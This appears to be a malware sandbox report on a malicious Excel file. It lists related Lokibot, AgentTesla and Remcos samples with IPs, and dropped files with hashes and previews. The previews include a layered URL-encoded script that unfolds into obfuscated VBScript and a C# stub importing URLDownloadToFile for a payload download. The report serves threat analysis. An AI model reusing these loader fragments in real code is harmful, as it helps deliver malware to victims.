                                                                                            05af1f5ca1b87cc9cc9b25185115607dPayment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.186.46
                                                                                            • 142.250.186.161
                                                                                            7dcce5b76c8b17472d024758970a406bPayment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 188.114.97.3
                                                                                            Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                                                            • 188.114.97.3
                                                                                            SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 188.114.97.3
                                                                                            No context
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4742
                                                                                            Entropy (8bit):4.8105940880640246
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                            MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                            SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                            SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                            SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):209223
                                                                                            Entropy (8bit):1.8943912506222536
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Eac75KAtf7aRNeKmo4T5vc1IPqCwFifcu7T:EaA52RNevpJVfZT
                                                                                            MD5:9DBF5EE2610284F5668FB229BA474B95
                                                                                            SHA1:12B3F4C93E36B9BCA1BFECF8FA522748D3631C74
                                                                                            SHA-256:FCC1B8C11B5CAE212CBDB9B7AAA083DA59CCAB319816D7EF8E37C2856347B0F0
                                                                                            SHA-512:06FE1B0E3CA4E04108FA8A50F60867E42F38E60768AEBBC8935A7C24B973CF3546F6F7F4548E9FAC67CEBE552319D7323FEE5EEAA87DC5F958AA23377CB3CCB2
                                                                                            Malicious:true
                                                                                            Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%25252520language%2525253DJavaScript%2525253Em%2525253D%25252527%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CSCript%2525252520TYpe%252525253D%2525252522tExt/VbscRiPt%2525252522%252525253E%252525250ADiM%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):139408
                                                                                            Entropy (8bit):3.700015256114386
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:5S7Ngt5pSGw2yzrgYvQw7ZweRFdvTtLALWdkj:EgmQowexvxHdkj
                                                                                            MD5:74339D80989D10693DBC1115D1CF3EB4
                                                                                            SHA1:BD9B4DEA8D68DB3261E4EB23A9DFE857D0F9EE44
                                                                                            SHA-256:A73C93345D81B888FE37255ABC545DCDB3470B4F0BD59654E4B398C87BE6B64D
                                                                                            SHA-512:4BEFE3383549FB2048E9617430B284F8B62CCE46FA4998A62122E7ED4349357AD9B11C0A0819C40467CE3B2CA7648222B1714E3745A4E74F50FAE3D569CAA1BA
                                                                                            Malicious:false
                                                                                            Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.i.c.a.)..... . . . .d.i.m. .g.r.a.f.i.t.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.r.a.f.i.t.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.r.a.f.i.t.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):11033
                                                                                            Entropy (8bit):3.4265352840021697
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:W/NdIKC38rVgjaXrEhiJhi7xvToXthi7Xnhi5ThiDQkLhixfmhixa51hiE50hiZL:W/YQK5kW0ksxftxaMEdZ+2KwxD
                                                                                            MD5:EDD77BF7C54A120D0A006B008A70B384
                                                                                            SHA1:083AD6B0BC110DD622B29B292138EE1288462FB4
                                                                                            SHA-256:B8DEBCF9D5828DD27713B6DA37B31A695DC8282CA6D2B93CA99728D52E82D5D9
                                                                                            SHA-512:DA4E3852D1630101ED0FB98043B74BFB4AAD83FEA0948E0C603E4169A862B9970232A2ABD3DDE882FA10CEB7642464DA8DD79FE84D0C51B485752E924287C912
                                                                                            Malicious:false
                                                                                            Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.i.c.a.)..... . . . .d.i.m. .g.r.a.f.i.t.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.r.a.f.i.t.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.r.a.f.i.t.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):38272
                                                                                            Entropy (8bit):2.8081661079517968
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:6/CJoV9KjGhFi1lildmP/4GtXULs9h2QmlC+a6gz5nCf5OBgJP+SKA:6/CbiG1l34GtXl2QmlC+a6gz5SOyJ1/
                                                                                            MD5:1ED1E7A0ED6137C48652115CA579221E
                                                                                            SHA1:B66C7110A3831166B32E3664AAF24AB75C0CCCA1
                                                                                            SHA-256:A694409B40BB7B2DFC78BE6C7ECDFC4F6A8B95305247EB520C57F9E0B1BBFDC3
                                                                                            SHA-512:93D917CEAD84FF6792723B2238A342F995A3AF8DD0003DA8298BB04F5A6D53F0C6EC7728D6EE51933BEBA015969EAD8C25F8566E6DC2CEE4EBF931F2422F25AE
                                                                                            Malicious:false
                                                                                            Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):349384
                                                                                            Entropy (8bit):3.7170605169628734
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:6dkVZD+Jb5qGYJ6OoG+RJ2dB9eJb85eKJBFgcxSoigiP/l5K:UkVZD+JbBYJhkRJiTeJI8KJcs/ibY
                                                                                            MD5:4491EFDD2921740B529E96BD780D0644
                                                                                            SHA1:A170615106A550A873E2FD78D913FA02264B1D19
                                                                                            SHA-256:2873A34503AFAFA73B48AB4C63CB00D14D209C24A704F6BBE92D5D9EA40BE538
                                                                                            SHA-512:FEFE0B18BD15EB774F42056EB9E39FD8BFF8DDEF76595E5EFEC9A76117D173513FFCFCF79A45ACDECD4F714DBC6E95EDB813AF610F19C96E1595D72DC7FDE707
                                                                                            Malicious:false
                                                                                            Preview:....l...........'....................S.. EMF.....T..S.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(.......'.......................%...........................................................L...d...........=...............<.......!..............?...........?................................'......................%...........(......................L...d...........F...............G...
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1462180
                                                                                            Entropy (8bit):4.432116325040296
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                            MD5:C88BBA4F839966D6648736A889FC1572
                                                                                            SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                            SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                            SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                            Malicious:false
                                                                                            Preview:....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):172076
                                                                                            Entropy (8bit):3.1342558498505824
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                            MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                            SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                            SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                            SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                            Malicious:false
                                                                                            Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):52712
                                                                                            Entropy (8bit):2.69601862257325
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:k37ZSy7s8wsI459Fwh+zRrXheOV8OV8OV1lJ//Te7rP:y7blMOV93WrP
                                                                                            MD5:57851611F066C7BD325A4B9817DD28B0
                                                                                            SHA1:A52AE733137921018D9670ABB919568CD5F90F2F
                                                                                            SHA-256:EE958A9DEF0CA8010229635A73E8F3621A234CAEE58EE7C6DF8CFE128490B139
                                                                                            SHA-512:A6B5D475F1247988B9139F2586D210FF0741203B398F7FB2CF8CB1C7C39250C52982954F81F576FF765E2561A3462078A173EA35749C1DDEF55FC99BD4918C85
                                                                                            Malicious:false
                                                                                            Preview:....l............................S...".. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                            Category:dropped
                                                                                            Size (bytes):1462180
                                                                                            Entropy (8bit):4.432116325040296
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                            MD5:C88BBA4F839966D6648736A889FC1572
                                                                                            SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                            SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                            SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                            Malicious:false
                                                                                            Preview:....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                            Category:dropped
                                                                                            Size (bytes):480
                                                                                            Entropy (8bit):3.9787141625870177
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:V/DsYLDS81zuH0qiwPMmHnQXReKJ8SRHy4HOCluVmmZOe/o2Iy:V/DTLDfuH05tXfH6ysXIy
                                                                                            MD5:CE22E90871744B25A04AC8C5691F49CC
                                                                                            SHA1:BC0A93C1FE61E00DAA34774994B638D19F735228
                                                                                            SHA-256:3B955E3C74519870AACEF3876B7CDC4420F0B77D2D09937B7385E8B578F26546
                                                                                            SHA-512:5F13AF44F2219D050D04658808B287BCB9C948765A1ACA148AB148E0981087AB22D6B5AF9FA74360B41A7322B9009858CF25E480A579B16FC8BD62C9B72D0F88
                                                                                            Malicious:false
                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace DZVrARMdWah.{. public class UbTbpiKe. {. [DllImport("UrlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr btGlUjs,string cDSFYG,string eDacYyTYYCQ,uint BkZoE,IntPtr AjQtbauHqbT);.. }..}.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):369
                                                                                            Entropy (8bit):5.26201805037218
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f/Gzxs7+AEszIP23f/V9:p37Lvkmb6KzWWZEoF9
                                                                                            MD5:C73B5CD9DFBF369622CE6CF79504A470
                                                                                            SHA1:3D1C03A3C72A637FF3F36AF3778BB911D6A41F54
                                                                                            SHA-256:86F81F29B7BB222838AB0C29BF480D3F95F3781F3271A81DAC7BBB78F3BDE8F7
                                                                                            SHA-512:3C4373A777DB81D800E908696B90BEE5EAD097762C088B77D9F250A10F2E6FD42D139C29329F7F2643F505C47D817C86A1A2F0FA58C526FF18ED0920AF62BA1D
                                                                                            Malicious:false
                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs"
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3072
                                                                                            Entropy (8bit):2.8759530313621333
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:etGS+p2YYnl8cPkSy1063VttkZfDvCq4lWI+ycuZhNgkFakS5kqPNnq:61Y8+gy1LFoJDKqF1ulgkFa35kGq
                                                                                            MD5:904EDDB3C1B071B72D127D96D4852DB5
                                                                                            SHA1:162CEAA7A2047B6622B6E05C59C3E52AA7720E5D
                                                                                            SHA-256:3FA930D1270F2387FA366FED78CF3E71759C6D398E4B0A84DE2E5A799223C2DA
                                                                                            SHA-512:CD592A5672FF1F699CE39551B85E917CFF38A1359A5317C0BA4B350E19D8E91E292833A54807103083F30DFB7D46C1877A227ACEB86E11A304D3991881EEA7A7
                                                                                            Malicious:false
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5....................................... .............. C.....P ......U.........[.....c.....j.....v.....|...U.....U...!.U.....U.......!.....*.!.....C.......................................,..........<Module>.3w
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):866
                                                                                            Entropy (8bit):5.351079054377748
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AId3ka6KznEoqKaMD5DqBVKVrdFAMBJTH:Akka60nEoqKdDcVKdBJj
                                                                                            MD5:755B362351B9F58EC0F5412A3B32409B
                                                                                            SHA1:B0F08401B59BFE62F6271F053CCB38D37EAF4CC8
                                                                                            SHA-256:B1812FAB86662356C225E147A0144F1671D57F31A5B28599B7D4B308C02B5301
                                                                                            SHA-512:CD8CAB413B177D9DFD71827F638DF8688E88BE5DF0405E0B7DB0C3B88B32CD8457BE0453530370D5837E0B60F56C3A1B82F5CBDBD0C86E9A561788BC001BA6B1
                                                                                            Malicious:false
                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):3.121803143532661
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzOlWlIoak7YnqqIOlWlI9PN5Dlq5J:+RI+ycuZhNgkFakS5kqPNnqX
                                                                                            MD5:E6655B069718CAA11CEF2F7DA404C421
                                                                                            SHA1:7EA61196B0AA3701776D18FD538C39CF4DD3190F
                                                                                            SHA-256:D7DA02FAFD3D4CF074E214A5B272DC31C4B898848B17A6F3977E2C9A0E0AC1A9
                                                                                            SHA-512:7BD9C7063EB6091037E1D29230DB3554B84667B07FE476167B035CE74AB6C773AC8FCCA99A1276619581761D9B61AA18CF773A774164708495ACBD80F9C06FB3
                                                                                            Malicious:false
